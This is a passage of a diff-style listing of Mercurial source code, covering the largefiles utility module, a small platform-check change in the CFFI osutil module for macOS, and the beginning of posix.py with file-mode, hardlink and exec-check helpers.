113 113 link(usercachepath(repo.ui, hash), path)
114 114 return path
115 115 return None
116 116
117 117 class largefilesdirstate(dirstate.dirstate):
118 118 def __getitem__(self, key):
119 119 return super(largefilesdirstate, self).__getitem__(unixpath(key))
120 120 def normal(self, f):
121 121 return super(largefilesdirstate, self).normal(unixpath(f))
122 122 def remove(self, f):
123 123 return super(largefilesdirstate, self).remove(unixpath(f))
124 124 def add(self, f):
125 125 return super(largefilesdirstate, self).add(unixpath(f))
126 126 def drop(self, f):
127 127 return super(largefilesdirstate, self).drop(unixpath(f))
128 128 def forget(self, f):
129 129 return super(largefilesdirstate, self).forget(unixpath(f))
130 130 def normallookup(self, f):
131 131 return super(largefilesdirstate, self).normallookup(unixpath(f))
132 132 def _ignore(self, f):
133 133 return False
134 134 def write(self, tr=False):
135 135 # (1) disable PENDING mode always
136 136 # (lfdirstate isn't yet managed as a part of the transaction)
137 137 # (2) avoid develwarn 'use dirstate.write with ....'
138 138 super(largefilesdirstate, self).write(None)
139 139
140 140 def openlfdirstate(ui, repo, create=True):
141 141 '''
142 142 Return a dirstate object that tracks largefiles: i.e. its root is
143 143 the repo root, but it is saved in .hg/largefiles/dirstate.
144 144 '''
145 145 vfs = repo.vfs
146 146 lfstoredir = longname
147 147 opener = vfsmod.vfs(vfs.join(lfstoredir))
148 148 lfdirstate = largefilesdirstate(opener, ui, repo.root,
149 149 repo.dirstate._validate,
150 150 lambda: sparse.matcher(repo))
151 151
152 152 # If the largefiles dirstate does not exist, populate and create
153 153 # it. This ensures that we create it on the first meaningful
154 154 # largefiles operation in a new clone.
155 155 if create and not vfs.exists(vfs.join(lfstoredir, 'dirstate')):
156 156 matcher = getstandinmatcher(repo)
157 157 standins = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
158 158 ignored=False)
159 159
160 160 if len(standins) > 0:
161 161 vfs.makedirs(lfstoredir)
162 162
163 163 for standin in standins:
164 164 lfile = splitstandin(standin)
165 165 lfdirstate.normallookup(lfile)
166 166 return lfdirstate
167 167
168 168 def lfdirstatestatus(lfdirstate, repo):
169 169 pctx = repo['.']
170 170 match = matchmod.always(repo.root, repo.getcwd())
171 171 unsure, s = lfdirstate.status(match, subrepos=[], ignored=False,
172 172 clean=False, unknown=False)
173 173 modified, clean = s.modified, s.clean
174 174 for lfile in unsure:
175 175 try:
176 176 fctx = pctx[standin(lfile)]
177 177 except LookupError:
178 178 fctx = None
179 179 if not fctx or readasstandin(fctx) != hashfile(repo.wjoin(lfile)):
180 180 modified.append(lfile)
181 181 else:
182 182 clean.append(lfile)
183 183 lfdirstate.normal(lfile)
184 184 return s
185 185
186 186 def listlfiles(repo, rev=None, matcher=None):
187 187 '''return a list of largefiles in the working copy or the
188 188 specified changeset'''
189 189
190 190 if matcher is None:
191 191 matcher = getstandinmatcher(repo)
192 192
193 193 # ignore unknown files in working directory
194 194 return [splitstandin(f)
195 195 for f in repo[rev].walk(matcher)
196 196 if rev is not None or repo.dirstate[f] != '?']
197 197
198 198 def instore(repo, hash, forcelocal=False):
199 199 '''Return true if a largefile with the given hash exists in the store'''
200 200 return os.path.exists(storepath(repo, hash, forcelocal))
201 201
202 202 def storepath(repo, hash, forcelocal=False):
203 203 '''Return the correct location in the repository largefiles store for a
204 204 file with the given hash.'''
205 205 if not forcelocal and repo.shared():
206 206 return repo.vfs.reljoin(repo.sharedpath, longname, hash)
207 207 return repo.vfs.join(longname, hash)
208 208
209 209 def findstorepath(repo, hash):
210 210 '''Search through the local store path(s) to find the file for the given
211 211 hash. If the file is not found, its path in the primary store is returned.
212 212 The return value is a tuple of (path, exists(path)).
213 213 '''
214 214 # For shared repos, the primary store is in the share source. But for
215 215 # backward compatibility, force a lookup in the local store if it wasn't
216 216 # found in the share source.
217 217 path = storepath(repo, hash, False)
218 218
219 219 if instore(repo, hash):
220 220 return (path, True)
221 221 elif repo.shared() and instore(repo, hash, True):
222 222 return storepath(repo, hash, True), True
223 223
224 224 return (path, False)
225 225
226 226 def copyfromcache(repo, hash, filename):
227 227 '''Copy the specified largefile from the repo or system cache to
228 228 filename in the repository. Return true on success or false if the
229 229 file was not found in either cache (which should not happened:
230 230 this is meant to be called only after ensuring that the needed
231 231 largefile exists in the cache).'''
232 232 wvfs = repo.wvfs
233 233 path = findfile(repo, hash)
234 234 if path is None:
235 235 return False
236 236 wvfs.makedirs(wvfs.dirname(wvfs.join(filename)))
237 237 # The write may fail before the file is fully written, but we
238 238 # don't use atomic writes in the working copy.
239 239 with open(path, 'rb') as srcfd, wvfs(filename, 'wb') as destfd:
240 240 gothash = copyandhash(
241 241 util.filechunkiter(srcfd), destfd)
242 242 if gothash != hash:
243 243 repo.ui.warn(_('%s: data corruption in %s with hash %s\n')
244 244 % (filename, path, gothash))
245 245 wvfs.unlink(filename)
246 246 return False
247 247 return True
248 248
249 249 def copytostore(repo, ctx, file, fstandin):
250 250 wvfs = repo.wvfs
251 251 hash = readasstandin(ctx[fstandin])
252 252 if instore(repo, hash):
253 253 return
254 254 if wvfs.exists(file):
255 255 copytostoreabsolute(repo, wvfs.join(file), hash)
256 256 else:
257 257 repo.ui.warn(_("%s: largefile %s not available from local store\n") %
258 258 (file, hash))
259 259
260 260 def copyalltostore(repo, node):
261 261 '''Copy all largefiles in a given revision to the store'''
262 262
263 263 ctx = repo[node]
264 264 for filename in ctx.files():
265 265 realfile = splitstandin(filename)
266 266 if realfile is not None and filename in ctx.manifest():
267 267 copytostore(repo, ctx, realfile, filename)
268 268
269 269 def copytostoreabsolute(repo, file, hash):
270 270 if inusercache(repo.ui, hash):
271 271 link(usercachepath(repo.ui, hash), storepath(repo, hash))
272 272 else:
273 273 util.makedirs(os.path.dirname(storepath(repo, hash)))
274 274 with open(file, 'rb') as srcf:
275 275 with util.atomictempfile(storepath(repo, hash),
276 276 createmode=repo.store.createmode) as dstf:
277 277 for chunk in util.filechunkiter(srcf):
278 278 dstf.write(chunk)
279 279 linktousercache(repo, hash)
280 280
281 281 def linktousercache(repo, hash):
282 282 '''Link / copy the largefile with the specified hash from the store
283 283 to the cache.'''
284 284 path = usercachepath(repo.ui, hash)
285 285 link(storepath(repo, hash), path)
286 286
287 287 def getstandinmatcher(repo, rmatcher=None):
288 288 '''Return a match object that applies rmatcher to the standin directory'''
289 289 wvfs = repo.wvfs
290 290 standindir = shortname
291 291
292 292 # no warnings about missing files or directories
293 293 badfn = lambda f, msg: None
294 294
295 295 if rmatcher and not rmatcher.always():
296 296 pats = [wvfs.join(standindir, pat) for pat in rmatcher.files()]
297 297 if not pats:
298 298 pats = [wvfs.join(standindir)]
299 299 match = scmutil.match(repo[None], pats, badfn=badfn)
300 300 else:
301 301 # no patterns: relative to repo root
302 302 match = scmutil.match(repo[None], [wvfs.join(standindir)], badfn=badfn)
303 303 return match
304 304
305 305 def composestandinmatcher(repo, rmatcher):
306 306 '''Return a matcher that accepts standins corresponding to the
307 307 files accepted by rmatcher. Pass the list of files in the matcher
308 308 as the paths specified by the user.'''
309 309 smatcher = getstandinmatcher(repo, rmatcher)
310 310 isstandin = smatcher.matchfn
311 311 def composedmatchfn(f):
312 312 return isstandin(f) and rmatcher.matchfn(splitstandin(f))
313 313 smatcher.matchfn = composedmatchfn
314 314
315 315 return smatcher
316 316
317 317 def standin(filename):
318 318 '''Return the repo-relative path to the standin for the specified big
319 319 file.'''
320 320 # Notes:
321 321 # 1) Some callers want an absolute path, but for instance addlargefiles
322 322 # needs it repo-relative so it can be passed to repo[None].add(). So
323 323 # leave it up to the caller to use repo.wjoin() to get an absolute path.
324 324 # 2) Join with '/' because that's what dirstate always uses, even on
325 325 # Windows. Change existing separator to '/' first in case we are
326 326 # passed filenames from an external source (like the command line).
327 327 return shortnameslash + util.pconvert(filename)
328 328
329 329 def isstandin(filename):
330 330 '''Return true if filename is a big file standin. filename must be
331 331 in Mercurial's internal form (slash-separated).'''
332 332 return filename.startswith(shortnameslash)
333 333
334 334 def splitstandin(filename):
335 335 # Split on / because that's what dirstate always uses, even on Windows.
336 336 # Change local separator to / first just in case we are passed filenames
337 337 # from an external source (like the command line).
338 338 bits = util.pconvert(filename).split('/', 1)
339 339 if len(bits) == 2 and bits[0] == shortname:
340 340 return bits[1]
341 341 else:
342 342 return None
343 343
344 344 def updatestandin(repo, lfile, standin):
345 345 """Re-calculate hash value of lfile and write it into standin
346 346
347 347 This assumes that "lfutil.standin(lfile) == standin", for efficiency.
348 348 """
349 349 file = repo.wjoin(lfile)
350 350 if repo.wvfs.exists(lfile):
351 351 hash = hashfile(file)
352 352 executable = getexecutable(file)
353 353 writestandin(repo, standin, hash, executable)
354 354 else:
355 355 raise error.Abort(_('%s: file not found!') % lfile)
356 356
357 357 def readasstandin(fctx):
358 358 '''read hex hash from given filectx of standin file
359 359
360 360 This encapsulates how "standin" data is stored into storage layer.'''
361 361 return fctx.data().strip()
362 362
363 363 def writestandin(repo, standin, hash, executable):
364 364 '''write hash to <repo.root>/<standin>'''
365 365 repo.wwrite(standin, hash + '\n', executable and 'x' or '')
366 366
367 367 def copyandhash(instream, outfile):
368 368 '''Read bytes from instream (iterable) and write them to outfile,
369 369 computing the SHA-1 hash of the data along the way. Return the hash.'''
370 370 hasher = hashlib.sha1('')
371 371 for data in instream:
372 372 hasher.update(data)
373 373 outfile.write(data)
374 374 return hasher.hexdigest()
375 375
376 376 def hashfile(file):
377 377 if not os.path.exists(file):
378 378 return ''
379 379 with open(file, 'rb') as fd:
380 380 return hexsha1(fd)
381 381
382 382 def getexecutable(filename):
383 383 mode = os.stat(filename).st_mode
384 384 return ((mode & stat.S_IXUSR) and
385 385 (mode & stat.S_IXGRP) and
386 386 (mode & stat.S_IXOTH))
387 387
388 388 def urljoin(first, second, *arg):
389 389 def join(left, right):
390 390 if not left.endswith('/'):
391 391 left += '/'
392 392 if right.startswith('/'):
393 393 right = right[1:]
394 394 return left + right
395 395
396 396 url = join(first, second)
397 397 for a in arg:
398 398 url = join(url, a)
399 399 return url
400 400
401 401 def hexsha1(fileobj):
402 402 """hexsha1 returns the hex-encoded sha1 sum of the data in the file-like
403 403 object data"""
404 404 h = hashlib.sha1()
405 405 for chunk in util.filechunkiter(fileobj):
406 406 h.update(chunk)
407 407 return h.hexdigest()
408 408
409 409 def httpsendfile(ui, filename):
410 410 return httpconnection.httpsendfile(ui, filename, 'rb')
411 411
412 412 def unixpath(path):
413 413 '''Return a version of path normalized for use with the lfdirstate.'''
414 414 return util.pconvert(os.path.normpath(path))
415 415
416 416 def islfilesrepo(repo):
417 417 '''Return true if the repo is a largefile repo.'''
418 418 if ('largefiles' in repo.requirements and
419 419 any(shortnameslash in f[0] for f in repo.store.datafiles())):
420 420 return True
421 421
422 422 return any(openlfdirstate(repo.ui, repo, False))
423 423
424 424 class storeprotonotcapable(Exception):
425 425 def __init__(self, storetypes):
426 426 self.storetypes = storetypes
427 427
428 428 def getstandinsstate(repo):
429 429 standins = []
430 430 matcher = getstandinmatcher(repo)
431 431 wctx = repo[None]
432 432 for standin in repo.dirstate.walk(matcher, subrepos=[], unknown=False,
433 433 ignored=False):
434 434 lfile = splitstandin(standin)
435 435 try:
436 436 hash = readasstandin(wctx[standin])
437 437 except IOError:
438 438 hash = None
439 439 standins.append((lfile, hash))
440 440 return standins
441 441
442 442 def synclfdirstate(repo, lfdirstate, lfile, normallookup):
443 443 lfstandin = standin(lfile)
444 444 if lfstandin in repo.dirstate:
445 445 stat = repo.dirstate._map[lfstandin]
446 446 state, mtime = stat[0], stat[3]
447 447 else:
448 448 state, mtime = '?', -1
449 449 if state == 'n':
450 450 if (normallookup or mtime < 0 or
451 451 not repo.wvfs.exists(lfile)):
452 452 # state 'n' doesn't ensure 'clean' in this case
453 453 lfdirstate.normallookup(lfile)
454 454 else:
455 455 lfdirstate.normal(lfile)
456 456 elif state == 'm':
457 457 lfdirstate.normallookup(lfile)
458 458 elif state == 'r':
459 459 lfdirstate.remove(lfile)
460 460 elif state == 'a':
461 461 lfdirstate.add(lfile)
462 462 elif state == '?':
463 463 lfdirstate.drop(lfile)
464 464
465 465 def markcommitted(orig, ctx, node):
466 466 repo = ctx.repo()
467 467
468 468 orig(node)
469 469
470 470 # ATTENTION: "ctx.files()" may differ from "repo[node].files()"
471 471 # because files coming from the 2nd parent are omitted in the latter.
472 472 #
473 473 # The former should be used to get targets of "synclfdirstate",
474 474 # because such files:
475 475 # - are marked as "a" by "patch.patch()" (e.g. via transplant), and
476 476 # - have to be marked as "n" after commit, but
477 477 # - aren't listed in "repo[node].files()"
478 478
479 479 lfdirstate = openlfdirstate(repo.ui, repo)
480 480 for f in ctx.files():
481 481 lfile = splitstandin(f)
482 482 if lfile is not None:
483 483 synclfdirstate(repo, lfdirstate, lfile, False)
484 484 lfdirstate.write()
485 485
486 486 # As part of committing, copy all of the largefiles into the cache.
487 487 #
488 488 # Using "node" instead of "ctx" implies additional "repo[node]"
489 489 # lookup while copyalltostore(), but can omit redundant check for
490 490 # files comming from the 2nd parent, which should exist in store
491 491 # at merging.
492 492 copyalltostore(repo, node)
493 493
494 494 def getlfilestoupdate(oldstandins, newstandins):
495 495 changedstandins = set(oldstandins).symmetric_difference(set(newstandins))
496 496 filelist = []
497 497 for f in changedstandins:
498 498 if f[0] not in filelist:
499 499 filelist.append(f[0])
500 500 return filelist
501 501
502 502 def getlfilestoupload(repo, missing, addfunc):
503 503 for i, n in enumerate(missing):
504 504 repo.ui.progress(_('finding outgoing largefiles'), i,
505 505 unit=_('revisions'), total=len(missing))
506 506 parents = [p for p in repo[n].parents() if p != node.nullid]
507 507
508 508 oldlfstatus = repo.lfstatus
509 509 repo.lfstatus = False
510 510 try:
511 511 ctx = repo[n]
512 512 finally:
513 513 repo.lfstatus = oldlfstatus
514 514
515 515 files = set(ctx.files())
516 516 if len(parents) == 2:
517 517 mc = ctx.manifest()
518 518 mp1 = ctx.parents()[0].manifest()
519 519 mp2 = ctx.parents()[1].manifest()
520 520 for f in mp1:
521 521 if f not in mc:
522 522 files.add(f)
523 523 for f in mp2:
524 524 if f not in mc:
525 525 files.add(f)
526 526 for f in mc:
527 527 if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
528 528 files.add(f)
529 529 for fn in files:
530 530 if isstandin(fn) and fn in ctx:
531 531 addfunc(fn, readasstandin(ctx[fn]))
532 532 repo.ui.progress(_('finding outgoing largefiles'), None)
533 533
534 534 def updatestandinsbymatch(repo, match):
535 535 '''Update standins in the working directory according to specified match
536 536
537 537 This returns (possibly modified) ``match`` object to be used for
538 538 subsequent commit process.
539 539 '''
540 540
541 541 ui = repo.ui
542 542
543 543 # Case 1: user calls commit with no specific files or
544 544 # include/exclude patterns: refresh and commit all files that
545 545 # are "dirty".
546 546 if match is None or match.always():
547 547 # Spend a bit of time here to get a list of files we know
548 548 # are modified so we can compare only against those.
549 549 # It can cost a lot of time (several seconds)
550 550 # otherwise to update all standins if the largefiles are
551 551 # large.
552 552 lfdirstate = openlfdirstate(ui, repo)
553 553 dirtymatch = matchmod.always(repo.root, repo.getcwd())
554 554 unsure, s = lfdirstate.status(dirtymatch, subrepos=[], ignored=False,
555 555 clean=False, unknown=False)
556 556 modifiedfiles = unsure + s.modified + s.added + s.removed
557 557 lfiles = listlfiles(repo)
558 558 # this only loops through largefiles that exist (not
559 559 # removed/renamed)
560 560 for lfile in lfiles:
561 561 if lfile in modifiedfiles:
562 562 fstandin = standin(lfile)
563 563 if repo.wvfs.exists(fstandin):
564 564 # this handles the case where a rebase is being
565 565 # performed and the working copy is not updated
566 566 # yet.
567 567 if repo.wvfs.exists(lfile):
568 568 updatestandin(repo, lfile, fstandin)
569 569
570 570 return match
571 571
572 572 lfiles = listlfiles(repo)
573 573 match._files = repo._subdirlfs(match.files(), lfiles)
574 574
575 575 # Case 2: user calls commit with specified patterns: refresh
576 576 # any matching big files.
577 577 smatcher = composestandinmatcher(repo, match)
578 578 standins = repo.dirstate.walk(smatcher, subrepos=[], unknown=False,
579 579 ignored=False)
580 580
581 581 # No matching big files: get out of the way and pass control to
582 582 # the usual commit() method.
583 583 if not standins:
584 584 return match
585 585
586 586 # Refresh all matching big files. It's possible that the
587 587 # commit will end up failing, in which case the big files will
588 588 # stay refreshed. No harm done: the user modified them and
589 589 # asked to commit them, so sooner or later we're going to
590 590 # refresh the standins. Might as well leave them refreshed.
591 591 lfdirstate = openlfdirstate(ui, repo)
592 592 for fstandin in standins:
593 593 lfile = splitstandin(fstandin)
594 594 if lfdirstate[lfile] != 'r':
595 595 updatestandin(repo, lfile, fstandin)
596 596
597 597 # Cook up a new matcher that only matches regular files or
598 598 # standins corresponding to the big files requested by the
599 599 # user. Have to modify _files to prevent commit() from
600 600 # complaining "not tracked" for big files.
601 601 match = copy.copy(match)
602 602 origmatchfn = match.matchfn
603 603
604 604 # Check both the list of largefiles and the list of
605 605 # standins because if a largefile was removed, it
606 606 # won't be in the list of largefiles at this point
607 607 match._files += sorted(standins)
608 608
609 609 actualfiles = []
610 610 for f in match._files:
611 611 fstandin = standin(f)
612 612
613 613 # For largefiles, only one of the normal and standin should be
614 614 # committed (except if one of them is a remove). In the case of a
615 615 # standin removal, drop the normal file if it is unknown to dirstate.
616 616 # Thus, skip plain largefile names but keep the standin.
617 617 if f in lfiles or fstandin in standins:
618 618 if repo.dirstate[fstandin] != 'r':
619 619 if repo.dirstate[f] != 'r':
620 620 continue
621 621 elif repo.dirstate[f] == '?':
622 622 continue
623 623
624 624 actualfiles.append(f)
625 625 match._files = actualfiles
626 626
627 627 def matchfn(f):
628 628 if origmatchfn(f):
629 629 return f not in lfiles
630 630 else:
631 631 return f in standins
632 632
633 633 match.matchfn = matchfn
634 634
635 635 return match
636 636
637 637 class automatedcommithook(object):
638 638 '''Stateful hook to update standins at the 1st commit of resuming
639 639
640 640 For efficiency, updating standins in the working directory should
641 641 be avoided while automated committing (like rebase, transplant and
642 642 so on), because they should be updated before committing.
643 643
644 644 But the 1st commit of resuming automated committing (e.g. ``rebase
645 645 --continue``) should update them, because largefiles may be
646 646 modified manually.
647 647 '''
648 648 def __init__(self, resuming):
649 649 self.resuming = resuming
650 650
651 651 def __call__(self, repo, match):
652 652 if self.resuming:
653 653 self.resuming = False # avoids updating at subsequent commits
654 654 return updatestandinsbymatch(repo, match)
655 655 else:
656 656 return match
657 657
658 658 def getstatuswriter(ui, repo, forcibly=None):
659 659 '''Return the function to write largefiles specific status out
660 660
661 661 If ``forcibly`` is ``None``, this returns the last element of
662 662 ``repo._lfstatuswriters`` as "default" writer function.
663 663
664 664 Otherwise, this returns the function to always write out (or
665 665 ignore if ``not forcibly``) status.
666 666 '''
667 667 if forcibly is None and util.safehasattr(repo, '_largefilesenabled'):
668 668 return repo._lfstatuswriters[-1]
669 669 else:
670 670 if forcibly:
671 671 return ui.status # forcibly WRITE OUT
672 672 else:
673 673 return lambda *msg, **opts: None # forcibly IGNORE
@@ -1,102 +1,102 b''
1 1 # osutil.py - CFFI version of osutil.c
2 2 #
3 3 # Copyright 2016 Maciej Fijalkowski <fijall@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import os
11 11 import stat as statmod
12 12
13 13 from ..pure.osutil import *
14 14
15 15 from .. import (
16 16 pycompat,
17 17 )
18 18
19 if pycompat.sysplatform == 'darwin':
19 if pycompat.isdarwin:
20 20 from . import _osutil
21 21
22 22 ffi = _osutil.ffi
23 23 lib = _osutil.lib
24 24
25 25 listdir_batch_size = 4096
26 26 # tweakable number, only affects performance, which chunks
27 27 # of bytes do we get back from getattrlistbulk
28 28
29 29 attrkinds = [None] * 20 # we need the max no for enum VXXX, 20 is plenty
30 30
31 31 attrkinds[lib.VREG] = statmod.S_IFREG
32 32 attrkinds[lib.VDIR] = statmod.S_IFDIR
33 33 attrkinds[lib.VLNK] = statmod.S_IFLNK
34 34 attrkinds[lib.VBLK] = statmod.S_IFBLK
35 35 attrkinds[lib.VCHR] = statmod.S_IFCHR
36 36 attrkinds[lib.VFIFO] = statmod.S_IFIFO
37 37 attrkinds[lib.VSOCK] = statmod.S_IFSOCK
38 38
39 39 class stat_res(object):
40 40 def __init__(self, st_mode, st_mtime, st_size):
41 41 self.st_mode = st_mode
42 42 self.st_mtime = st_mtime
43 43 self.st_size = st_size
44 44
45 45 tv_sec_ofs = ffi.offsetof("struct timespec", "tv_sec")
46 46 buf = ffi.new("char[]", listdir_batch_size)
47 47
48 48 def listdirinternal(dfd, req, stat, skip):
49 49 ret = []
50 50 while True:
51 51 r = lib.getattrlistbulk(dfd, req, buf, listdir_batch_size, 0)
52 52 if r == 0:
53 53 break
54 54 if r == -1:
55 55 raise OSError(ffi.errno, os.strerror(ffi.errno))
56 56 cur = ffi.cast("val_attrs_t*", buf)
57 57 for i in range(r):
58 58 lgt = cur.length
59 59 assert lgt == ffi.cast('uint32_t*', cur)[0]
60 60 ofs = cur.name_info.attr_dataoffset
61 61 str_lgt = cur.name_info.attr_length
62 62 base_ofs = ffi.offsetof('val_attrs_t', 'name_info')
63 63 name = str(ffi.buffer(ffi.cast("char*", cur) + base_ofs + ofs,
64 64 str_lgt - 1))
65 65 tp = attrkinds[cur.obj_type]
66 66 if name == "." or name == "..":
67 67 continue
68 68 if skip == name and tp == statmod.S_ISDIR:
69 69 return []
70 70 if stat:
71 71 mtime = cur.mtime.tv_sec
72 72 mode = (cur.accessmask & ~lib.S_IFMT)| tp
73 73 ret.append((name, tp, stat_res(st_mode=mode, st_mtime=mtime,
74 74 st_size=cur.datalength)))
75 75 else:
76 76 ret.append((name, tp))
77 77 cur = ffi.cast("val_attrs_t*", int(ffi.cast("intptr_t", cur))
78 78 + lgt)
79 79 return ret
80 80
81 81 def listdir(path, stat=False, skip=None):
82 82 req = ffi.new("struct attrlist*")
83 83 req.bitmapcount = lib.ATTR_BIT_MAP_COUNT
84 84 req.commonattr = (lib.ATTR_CMN_RETURNED_ATTRS |
85 85 lib.ATTR_CMN_NAME |
86 86 lib.ATTR_CMN_OBJTYPE |
87 87 lib.ATTR_CMN_ACCESSMASK |
88 88 lib.ATTR_CMN_MODTIME)
89 89 req.fileattr = lib.ATTR_FILE_DATALENGTH
90 90 dfd = lib.open(path, lib.O_RDONLY, 0)
91 91 if dfd == -1:
92 92 raise OSError(ffi.errno, os.strerror(ffi.errno))
93 93
94 94 try:
95 95 ret = listdirinternal(dfd, req, stat, skip)
96 96 finally:
97 97 try:
98 98 lib.close(dfd)
99 99 except BaseException:
100 100 pass # we ignore all the errors from closing, not
101 101 # much we can do about that
102 102 return ret
@@ -1,675 +1,675 b''
1 1 # posix.py - Posix utility function implementations for Mercurial
2 2 #
3 3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import errno
11 11 import fcntl
12 12 import getpass
13 13 import grp
14 14 import os
15 15 import pwd
16 16 import re
17 17 import select
18 18 import stat
19 19 import sys
20 20 import tempfile
21 21 import unicodedata
22 22
23 23 from .i18n import _
24 24 from . import (
25 25 encoding,
26 26 error,
27 27 pycompat,
28 28 )
29 29
30 30 posixfile = open
31 31 normpath = os.path.normpath
32 32 samestat = os.path.samestat
33 33 try:
34 34 oslink = os.link
35 35 except AttributeError:
36 36 # Some platforms build Python without os.link on systems that are
37 37 # vaguely unix-like but don't have hardlink support. For those
38 38 # poor souls, just say we tried and that it failed so we fall back
39 39 # to copies.
40 40 def oslink(src, dst):
41 41 raise OSError(errno.EINVAL,
42 42 'hardlinks not supported: %s to %s' % (src, dst))
43 43 unlink = os.unlink
44 44 rename = os.rename
45 45 removedirs = os.removedirs
46 46 expandglobs = False
47 47
48 48 umask = os.umask(0)
49 49 os.umask(umask)
50 50
51 51 def split(p):
52 52 '''Same as posixpath.split, but faster
53 53
54 54 >>> import posixpath
55 55 >>> for f in [b'/absolute/path/to/file',
56 56 ... b'relative/path/to/file',
57 57 ... b'file_alone',
58 58 ... b'path/to/directory/',
59 59 ... b'/multiple/path//separators',
60 60 ... b'/file_at_root',
61 61 ... b'///multiple_leading_separators_at_root',
62 62 ... b'']:
63 63 ... assert split(f) == posixpath.split(f), f
64 64 '''
65 65 ht = p.rsplit('/', 1)
66 66 if len(ht) == 1:
67 67 return '', p
68 68 nh = ht[0].rstrip('/')
69 69 if nh:
70 70 return nh, ht[1]
71 71 return ht[0] + '/', ht[1]
72 72
73 73 def openhardlinks():
74 74 '''return true if it is safe to hold open file handles to hardlinks'''
75 75 return True
76 76
77 77 def nlinks(name):
78 78 '''return number of hardlinks for the given file'''
79 79 return os.lstat(name).st_nlink
80 80
81 81 def parsepatchoutput(output_line):
82 82 """parses the output produced by patch and returns the filename"""
83 83 pf = output_line[14:]
84 84 if pycompat.sysplatform == 'OpenVMS':
85 85 if pf[0] == '`':
86 86 pf = pf[1:-1] # Remove the quotes
87 87 else:
88 88 if pf.startswith("'") and pf.endswith("'") and " " in pf:
89 89 pf = pf[1:-1] # Remove the quotes
90 90 return pf
91 91
92 92 def sshargs(sshcmd, host, user, port):
93 93 '''Build argument list for ssh'''
94 94 args = user and ("%s@%s" % (user, host)) or host
95 95 if '-' in args[:1]:
96 96 raise error.Abort(
97 97 _('illegal ssh hostname or username starting with -: %s') % args)
98 98 args = shellquote(args)
99 99 if port:
100 100 args = '-p %s %s' % (shellquote(port), args)
101 101 return args
102 102
103 103 def isexec(f):
104 104 """check whether a file is executable"""
105 105 return (os.lstat(f).st_mode & 0o100 != 0)
106 106
107 107 def setflags(f, l, x):
108 108 st = os.lstat(f)
109 109 s = st.st_mode
110 110 if l:
111 111 if not stat.S_ISLNK(s):
112 112 # switch file to link
113 113 fp = open(f)
114 114 data = fp.read()
115 115 fp.close()
116 116 unlink(f)
117 117 try:
118 118 os.symlink(data, f)
119 119 except OSError:
120 120 # failed to make a link, rewrite file
121 121 fp = open(f, "w")
122 122 fp.write(data)
123 123 fp.close()
124 124 # no chmod needed at this point
125 125 return
126 126 if stat.S_ISLNK(s):
127 127 # switch link to file
128 128 data = os.readlink(f)
129 129 unlink(f)
130 130 fp = open(f, "w")
131 131 fp.write(data)
132 132 fp.close()
133 133 s = 0o666 & ~umask # avoid restatting for chmod
134 134
135 135 sx = s & 0o100
136 136 if st.st_nlink > 1 and bool(x) != bool(sx):
137 137 # the file is a hardlink, break it
138 138 with open(f, "rb") as fp:
139 139 data = fp.read()
140 140 unlink(f)
141 141 with open(f, "wb") as fp:
142 142 fp.write(data)
143 143
144 144 if x and not sx:
145 145 # Turn on +x for every +r bit when making a file executable
146 146 # and obey umask.
147 147 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
148 148 elif not x and sx:
149 149 # Turn off all +x bits
150 150 os.chmod(f, s & 0o666)
151 151
152 152 def copymode(src, dst, mode=None):
153 153 '''Copy the file mode from the file at path src to dst.
154 154 If src doesn't exist, we're using mode instead. If mode is None, we're
155 155 using umask.'''
156 156 try:
157 157 st_mode = os.lstat(src).st_mode & 0o777
158 158 except OSError as inst:
159 159 if inst.errno != errno.ENOENT:
160 160 raise
161 161 st_mode = mode
162 162 if st_mode is None:
163 163 st_mode = ~umask
164 164 st_mode &= 0o666
165 165 os.chmod(dst, st_mode)
166 166
167 167 def checkexec(path):
168 168 """
169 169 Check whether the given path is on a filesystem with UNIX-like exec flags
170 170
171 171 Requires a directory (like /foo/.hg)
172 172 """
173 173
174 174 # VFAT on some Linux versions can flip mode but it doesn't persist
175 175 # a FS remount. Frequently we can detect it if files are created
176 176 # with exec bit on.
177 177
178 178 try:
179 179 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
180 180 cachedir = os.path.join(path, '.hg', 'cache')
181 181 if os.path.isdir(cachedir):
182 182 checkisexec = os.path.join(cachedir, 'checkisexec')
183 183 checknoexec = os.path.join(cachedir, 'checknoexec')
184 184
185 185 try:
186 186 m = os.stat(checkisexec).st_mode
187 187 except OSError as e:
188 188 if e.errno != errno.ENOENT:
189 189 raise
190 190 # checkisexec does not exist - fall through ...
191 191 else:
192 192 # checkisexec exists, check if it actually is exec
193 193 if m & EXECFLAGS != 0:
194 194 # ensure checkisexec exists, check it isn't exec
195 195 try:
196 196 m = os.stat(checknoexec).st_mode
197 197 except OSError as e:
198 198 if e.errno != errno.ENOENT:
199 199 raise
200 200 open(checknoexec, 'w').close() # might fail
201 201 m = os.stat(checknoexec).st_mode
202 202 if m & EXECFLAGS == 0:
203 203 # check-exec is exec and check-no-exec is not exec
204 204 return True
205 205 # checknoexec exists but is exec - delete it
206 206 unlink(checknoexec)
207 207 # checkisexec exists but is not exec - delete it
208 208 unlink(checkisexec)
209 209
210 210 # check using one file, leave it as checkisexec
211 211 checkdir = cachedir
212 212 else:
213 213 # check directly in path and don't leave checkisexec behind
214 214 checkdir = path
215 215 checkisexec = None
216 216 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
217 217 try:
218 218 os.close(fh)
219 219 m = os.stat(fn).st_mode
220 220 if m & EXECFLAGS == 0:
221 221 os.chmod(fn, m & 0o777 | EXECFLAGS)
222 222 if os.stat(fn).st_mode & EXECFLAGS != 0:
223 223 if checkisexec is not None:
224 224 os.rename(fn, checkisexec)
225 225 fn = None
226 226 return True
227 227 finally:
228 228 if fn is not None:
229 229 unlink(fn)
230 230 except (IOError, OSError):
231 231 # we don't care, the user probably won't be able to commit anyway
232 232 return False
233 233
234 234 def checklink(path):
235 235 """check whether the given path is on a symlink-capable filesystem"""
236 236 # mktemp is not racy because symlink creation will fail if the
237 237 # file already exists
238 238 while True:
239 239 cachedir = os.path.join(path, '.hg', 'cache')
